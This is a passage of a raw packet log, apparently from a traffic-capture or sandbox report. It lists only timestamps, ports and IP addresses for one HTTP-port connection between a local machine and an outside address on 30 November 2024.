Nov 30, 2024 04:06:10.903002977 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.903048992 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.903789043 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.903835058 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.903974056 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.904017925 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.904721975 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.904766083 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.904774904 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.904813051 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.905643940 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.905685902 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.905692101 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.905728102 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.906594038 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.906640053 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.906682014 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.906721115 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.907543898 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.907592058 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.907645941 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.907691002 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.908473969 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.908521891 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.908624887 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.908668995 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.909401894 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.909447908 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.909482956 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.909528017 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.995490074 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.995578051 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.995584011 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.995618105 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.995956898 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.996005058 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.996058941 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.996104002 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.996885061 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.996933937 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.996974945 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.997020006 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:10.997785091 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:10.997833967 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.056464911 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.056512117 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.056664944 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.056704044 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.056912899 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.056982994 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.057049036 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.057085991 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.057851076 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.057898998 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.057941914 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.057982922 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.058764935 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.058809042 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.058891058 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.058928967 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.059736967 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.059796095 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.059833050 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.059875011 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.060645103 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.060693026 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.060743093 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.060785055 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.061583996 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.061630011 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.061691046 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.061729908 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.062545061 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.062589884 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.062689066 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.062731028 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.063455105 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.063503027 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.063579082 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.063621998 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.064404011 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.064455986 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.064476013 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.064519882 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.065359116 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.065407038 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.065450907 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.065499067 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.066261053 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.066298962 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.066387892 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.066427946 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.067214012 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.067255974 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.067333937 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.067372084 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.068166971 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.068207026 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.068268061 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.068305016 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.069087029 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.069129944 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.069202900 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.069246054 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.070013046 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.070053101 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.070131063 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.070173979 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.070966005 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.071022987 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.071060896 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.071099997 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.071948051 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.071990967 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.072046041 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.072082996 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.072859049 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.072899103 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.072972059 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.073009968 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.073803902 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.073842049 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.073904991 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.073941946 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.074727058 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.074852943 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.074857950 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.074897051 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.075686932 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.075732946 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.075803995 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.075845003 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.076600075 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.076642036 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.076704979 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.076742887 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.077555895 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.077600002 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.077634096 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.077676058 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.078461885 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.078506947 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.078588963 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.078627110 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.079417944 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.079459906 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.079514980 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.079552889 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.080363035 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.080404043 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.080490112 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.080532074 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.081305981 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.081352949 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.081388950 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.081434965 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.082257986 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.082299948 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.082334042 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.082434893 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.083177090 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.083225012 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.083281994 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.083328962 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.084125042 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.084142923 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.084173918 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.084187984 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.085057020 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.085103035 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.085156918 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.085199118 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.085992098 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.086033106 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.086101055 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.086138964 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.086937904 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.086997032 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.087033033 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.087073088 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.087877989 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.087929964 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.087985039 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.088026047 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.088828087 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.088872910 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.088912010 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.088948011 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.089766026 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.089818954 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.089853048 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.089894056 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.090692997 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.090733051 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.090776920 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.090811014 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.091629028 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.091680050 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.091716051 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.091756105 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.092617989 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.092721939 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.092730999 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.092789888 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.093503952 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.093553066 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.093604088 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.093713045 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.094455004 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.094496965 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.094543934 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.094584942 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.095380068 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.095429897 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.095494032 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.095532894 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.096323013 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.096378088 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.096416950 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.096457005 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.097263098 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.097306967 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.097373962 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.097414017 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.098196983 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.098246098 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.098299980 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.098347902 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.099163055 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.099234104 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.099257946 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.099301100 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.100097895 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.100147009 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.100224018 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.100269079 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.101141930 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.101197958 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.101212978 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.101254940 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.101958990 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.102004051 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.102031946 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.102073908 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.187427044 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.187485933 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.187520981 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.187536001 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.187706947 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.187757015 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.187818050 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.187864065 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.188651085 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.188694000 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.188760042 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.188803911 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.189606905 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.189654112 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.189661980 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.189703941 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.247962952 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.248028994 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.248141050 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.248423100 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.248471975 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.248557091 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.248606920 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.249370098 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.249414921 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.249486923 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.249526978 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.250320911 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.250371933 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.250431061 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.250524044 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.251264095 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.251317024 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.251365900 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.251410007 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.252187967 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.252233982 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.252295017 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.252341032 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.253128052 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.253173113 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.253226042 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.253273964 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.254053116 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.254098892 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.254168034 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.254211903 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.255003929 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.255049944 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.255161047 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.255206108 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.255933046 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.255975962 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.256088018 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.256131887 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.256891966 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.256933928 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.257042885 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.257081032 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.257810116 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.257857084 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.257925034 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.257971048 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.258745909 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.258793116 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.258867979 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.258914948 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.259718895 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.259766102 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.259813070 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.259859085 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.260636091 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.260684967 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.260750055 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.260795116 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.261589050 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.261636019 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.261699915 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.261744976 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.262505054 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.262551069 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.262604952 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.262656927 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.263442039 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.263489962 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.263550043 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.263595104 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.264389992 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.264436960 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.264503002 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.264547110 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.265337944 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.265384912 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.265459061 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:11.265503883 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:11.266266108 CET	80	49765	31.41.244.11	192.168.2.4
